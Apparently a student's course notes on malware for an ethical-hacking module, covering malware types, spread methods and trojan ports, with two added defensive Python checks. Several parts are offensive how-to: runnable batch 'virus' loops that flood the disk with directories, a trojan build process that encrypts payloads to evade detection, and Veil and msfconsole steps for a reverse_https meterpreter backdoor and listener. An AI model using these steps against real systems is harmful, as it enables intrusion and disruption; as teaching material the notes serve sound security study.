module 6 malware.txt
1. Malware concepts:
Malware is a combination of two words, i.e. malicious + software.
Software: software is a piece of code or a script designed to perform a particular task,
and if that software is made to fulfil someone's malicious intention, it is malicious software.
Malware can infect a system by being bundled with another program or attached to a file.
An attacker can infect a system, network or device by finding a vulnerability in it and installing the malware there,
or by social engineering, where a person clicks on a link or mail and the malware gets executed behind it.
https://youtu.be/V-WleeTocu4
Purpose of malware:
>Steal files
>Encrypt or delete sensitive data
>Spy
>Corrupt system/application
>Tamper with the normal working of a system/app
>Misuse system resources -- RAM/CPU/storage
>Monitor user activity (online/offline) -- browser/desktop surfing/files viewed
>Monitor user keystrokes
>Extort money -- after infecting your system they ask you for money,
saying they will resolve it.
How malware spreads:
1. Free software:
People don't want to buy software, so they download it from insecure sites, and into that
software the hacker binds their malware. Once it is downloaded onto the system it can give access to the attacker;
the hacker can also create a backdoor so that even after the software is uninstalled the attacker can remotely access the victim's system.
That is why corporates and other organisations don't use free software.
2. Email communications:
An attacker can pose as anyone, e.g. as an organisation, and send you a mail saying they are hiring you and paying you
such-and-such an amount, and with that mail they attach a PDF saying go through this PDF for more detailed info.
But that PDF comes with the malware, so the moment you open it the malware gets executed and can compromise your system.
3. Removable devices:
Suppose an attacker asks you for some files and asks whether he can use his pendrive to get them,
and you allow him to; through that pendrive the attacker can leave his malware and compromise your system.
EX: Rubber Ducky USB (it sends 1000 commands per sec); it can steal your SAM file and also passwords from Chrome.
*Types of malware:
1. Virus
2. Worms: Stuxnet, the Snowden movie
3. Trojan horse
4. Ransomware
5. Rootkit
6. Spyware
7. Keylogger: REFOG
1. Virus:
It requires human interaction to spread the infection,
e.g. through a USB / email attachment / harmful file;
the user's click is required.
Indications of a virus:
>BSOD (Blue Screen of Death)
>System will be slow
>Unnecessary files will run in the background
Types of virus:
1. Boot sector virus:
Our hard drive is divided into sectors, and the first sector is the MBR (Master Boot Record).
The MBR contains the information about which OS our PC is using and boots our system, as it contains the boot loader.
So when our system gets infected with a boot sector virus, the virus gets placed at the location of the MBR and moves the original MBR into the
next sector.
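As an added example (not from these notes), a Python check of the kind a defender would run to notice the MBR tampering described above: it parses a 512-byte boot sector, validates the 0x55AA signature and partition table, and compares the SHA-256 of the boot code with a previously recorded known-good hash. The sector bytes are constructed inline rather than read from a real disk.

```python
import hashlib
import struct

SECTOR_SIZE = 512
MBR_SIGNATURE = b"\x55\xaa"   # bytes 510-511 of a valid MBR
PART_TABLE_OFFSET = 446       # boot code occupies bytes 0-445
PART_ENTRY_FMT = "<B3xB3xII"  # status, CHS start (skipped), type, CHS end (skipped), LBA start, sectors

def parse_mbr(sector: bytes) -> dict:
    """Split a 512-byte MBR into boot-code hash, in-use partition entries and signature check."""
    if len(sector) != SECTOR_SIZE:
        raise ValueError("an MBR is exactly 512 bytes")
    partitions = []
    for i in range(4):
        status, ptype, lba, count = struct.unpack_from(PART_ENTRY_FMT, sector, PART_TABLE_OFFSET + 16 * i)
        if ptype != 0:  # type 0 marks an unused slot
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba, "sectors": count})
    return {"valid_signature": sector[510:512] == MBR_SIGNATURE,
            "boot_code_sha256": hashlib.sha256(sector[:PART_TABLE_OFFSET]).hexdigest(),
            "partitions": partitions}

def check_mbr(sector: bytes, baseline_boot_sha256: str) -> list:
    """Return findings; an empty list means the sector still matches the recorded baseline."""
    info = parse_mbr(sector)
    findings = []
    if not info["valid_signature"]:
        findings.append("missing 0x55AA boot signature")
    if info["boot_code_sha256"] != baseline_boot_sha256:
        findings.append("boot code changed from baseline")
    if not any(p["bootable"] for p in info["partitions"]):
        findings.append("no partition flagged bootable")
    return findings

def build_sample_mbr(boot_code: bytes) -> bytes:
    """Constructed sector: given boot code, one bootable type-0x07 partition at LBA 2048, valid signature."""
    sector = bytearray(SECTOR_SIZE)
    sector[:len(boot_code)] = boot_code
    struct.pack_into(PART_ENTRY_FMT, sector, PART_TABLE_OFFSET, 0x80, 0x07, 2048, 204800)
    sector[510:512] = MBR_SIGNATURE
    return bytes(sector)

# Constructed samples: the "clean" sector is recorded as the baseline; the second has replaced boot code.
CLEAN_MBR = build_sample_mbr(b"\xfa\x33\xc0\x8e\xd0")
BASELINE_SHA256 = parse_mbr(CLEAN_MBR)["boot_code_sha256"]
TAMPERED_MBR = build_sample_mbr(b"\xeb\xfe")  # same partition table, different first-stage code
```

On a real Linux host the first 512 bytes of the disk device (e.g. `/dev/sda`, readable only as root) can be passed to `check_mbr` against a hash recorded when the machine was known to be clean.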
2. File virus:
Comes with a .exe file; when we execute the .exe
the virus gets executed.
3. Macro virus:
Mainly targets MS Office. A virus written in
VBS (Visual Basic Script).
Macro viruses are programmed to perform lots of tasks on computers. For example, a macro virus can create new files, corrupt data, move text, send files, format hard drives, and insert pictures.
4. Cluster virus:
Ties itself to an executable, and whenever we open that .exe
the virus gets executed.
Cluster viruses change the directory so that when you try to run a program you first run the virus.
5. Stealth virus:
Tries to hide and avoid being detected by antivirus (FUD: fully
undetectable virus).
6. Logic bomb:
It will execute at a given date and time.
7. Encryption virus:
Encrypts itself to avoid being identified by antivirus.
8. Metamorphic virus:
Able to change its code and signatures so that it becomes
undetectable by antivirus.
9. Shell virus:
It executes inside a shell (the shell is the deepest part of the system).
Make a virus:
:test
md test
cd test
goto test
Save as .bat and double click on the file to execute (this loops forever, creating an ever deeper chain of nested "test" directories).
The BAT file format is used for DOS (Disk Operating System) batch files, which contain commands for starting built-in Windows applications and resources. The sequential lines in a BAT file normally run installed applications, built-in programs and maintenance utilities on Windows systems. BAT files can be created and edited with Microsoft Notepad or any other text editor, and are commonly written to automate repetitive tasks performed by installed Windows applications.
DOS (Disk Operating System) is an operating system that runs from a hard disk drive. The term can also refer to a particular family of disk operating systems, most commonly MS-DOS (Microsoft Disk Operating System).
:test
start calc
start notepad
start mspaint
Save as .bat and double click on the file to execute (this opens Calculator, Notepad and Paint).
:test
md %random%
goto test
(This loops forever, creating directories with random numeric names.)
*Malicious batch scripts... search Google for more
viruses.
2. Worms:
Ability to self-replicate / self-propagate -- inside and
outside the network.
A computer worm is a type of malware that spreads copies of itself from computer to computer. A worm can replicate itself without any human interaction, and it does not need to attach itself to a software program in order to cause damage.
VirusTotal is a website where we can scan our files or anything else; it runs 60 to 70 antivirus engines to detect whether they contain any malware.
3. Trojan horse:
Link: https://www.youtube.com/watch?v=Td1uPq9K--E
It is the same concept as we discussed: the same method of getting installed onto the system and compromising it.
There are some ports which, if they are open on your system, mean your PC is infected by a trojan:
2
20
1095-1098 used by RAT (Remote Access Trojan)
17300 NetBus (dangerous trojan)
10080 Sub7 (the deadliest of all time)
65506 Sub7
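As an added example that is not part of the original notes, a Python detector that parses `netstat -ano` style output (a constructed sample, not a real capture) and flags sockets listening on the ports listed above together with the owning PID. The port list is only a heuristic, since a trojan can listen on any port, so a hit should be confirmed by examining the process behind the PID rather than treated as proof of infection.

```python
import re

# Ports the notes above associate with trojans (RAT 1095-1098, NetBus 17300, Sub7 10080/65506).
SUSPICIOUS_PORTS = {2: "listed in notes", 20: "listed in notes", 17300: "NetBus",
                    10080: "Sub7", 65506: "Sub7"}
SUSPICIOUS_PORTS.update({p: "RAT" for p in range(1095, 1099)})

# One line of Windows `netstat -ano`: proto, local addr:port, remote, optional state (TCP only), PID.
NETSTAT_LINE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<local>\S+):(?P<port>\d+)\s+(?P<remote>\S+)\s+"
    r"(?:(?P<state>[A-Z_]+)\s+)?(?P<pid>\d+)\s*$")

def parse_netstat(output: str) -> list:
    """Parse netstat -ano text into dicts; the header line and blank lines are skipped."""
    rows = []
    for line in output.splitlines():
        m = NETSTAT_LINE.match(line)
        if m:
            rows.append({"proto": m["proto"], "port": int(m["port"]), "remote": m["remote"],
                         "state": m["state"] or "", "pid": int(m["pid"])})
    return rows

def find_suspicious_listeners(output: str) -> list:
    """Return listening sockets bound to a port from the notes' list, with the name given there."""
    hits = []
    for row in parse_netstat(output):
        # UDP has no state column; a TCP socket only counts when it is LISTENING (a server),
        # so an outbound connection that happens to use one of these local ports is not flagged.
        listening = row["proto"] == "UDP" or row["state"] == "LISTENING"
        if listening and row["port"] in SUSPICIOUS_PORTS:
            hits.append({"port": row["port"], "pid": row["pid"], "name": SUSPICIOUS_PORTS[row["port"]]})
    return hits

# Constructed sample output (addresses from documentation ranges), not captured from a real host.
SAMPLE_NETSTAT = """
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:17300          0.0.0.0:0              LISTENING       4120
  TCP    [::]:1096              [::]:0                 LISTENING       4120
  TCP    192.168.1.5:1097       203.0.113.10:443       ESTABLISHED     2200
  UDP    0.0.0.0:5353           *:*                                    1260
"""
```

On a live Windows host, feed the output of `netstat -ano` to `find_suspicious_listeners` and look up each flagged PID in Task Manager or `tasklist /FI "PID eq <pid>"` to see which program owns the socket.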
Trojan process:
1. Create a trojan using a trojan construction kit.
2. Use a wrapper to wrap it -> we bind the trojan with a genuine
application using the wrapper.
3. Use encryption so that it will not get recognized by an IDS (intrusion detection system) or IPS (intrusion prevention system).
4. Send it to the victim.
5. Take control.
Languages used to make trojans:
Assembly language: fast and undetectable
C, C++
Python -> easy to learn, builds malware, and easily detectable.
Types of trojan:
1. Defacement trojan:
After compromising a website or system, the hacker displays
black, blue or some other colour on your screen and leaves a message there
like "you have been hacked".
2. HTTP and HTTPS trojan:
They target web applications.
3. RAT (Remote Access Trojan):
You can remotely access the computer.
Trojan tools:
ProRat
DarkHorse Trojan Virus Maker
5. Rootkit: A rootkit is malicious software that allows an unauthorized user to have privileged access to a computer and to restricted areas of its software. A rootkit may contain a number of malicious tools such as keyloggers, banking credential stealers, password stealers, antivirus disablers, and bots for DDoS attacks.
Rootkit tools:
1. Horse Pill (Linux)
2. GrayFish (Windows)
3. Sirefef
4. Necurs
6. Spyware: Spyware is used to detect what the victim is searching for, which websites
he is visiting, and how much time he is spending on a particular site.
7. Keylogger: It is used to capture your keyboard input;
whatever you type on your keyboard
is all captured by the hacker.
*Files that are executable in Windows:
.bat: batch file
.bin: binary executable
.cmd: command script
.exe: executable
.com: command file
*Files that are executable in Linux:
.deb file if it is Debian based
.elf
Reverse shell:
Bind shell:
LHOST LPORT:
RHOST RPORT:
MSFVENOM:
RAT: (Remote Administration Tool)
DarkComet: it disables Defender and antivirus
EXTRA:
VEIL:
Veil is a framework for generating backdoors.
Steps:
>list
1. Evasion (it detects backdoors for us)
2. Ordnance (it generates the payloads used by Evasion)
>use 1
>list (to see all available payloads)
>use 15
>set LHOST <ip>, set processors 1, set lport 8080, set sleep 6
>options
>generate
>rev_https_8080
msfconsole
>use exploit/multi/handler (it allows us to listen for the incoming connection)
>show options
>set payload windows/meterpreter/reverse_https
>exploit
*Similar tools
>>Empire
>>TheFatRat
Windows 10 download link: https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/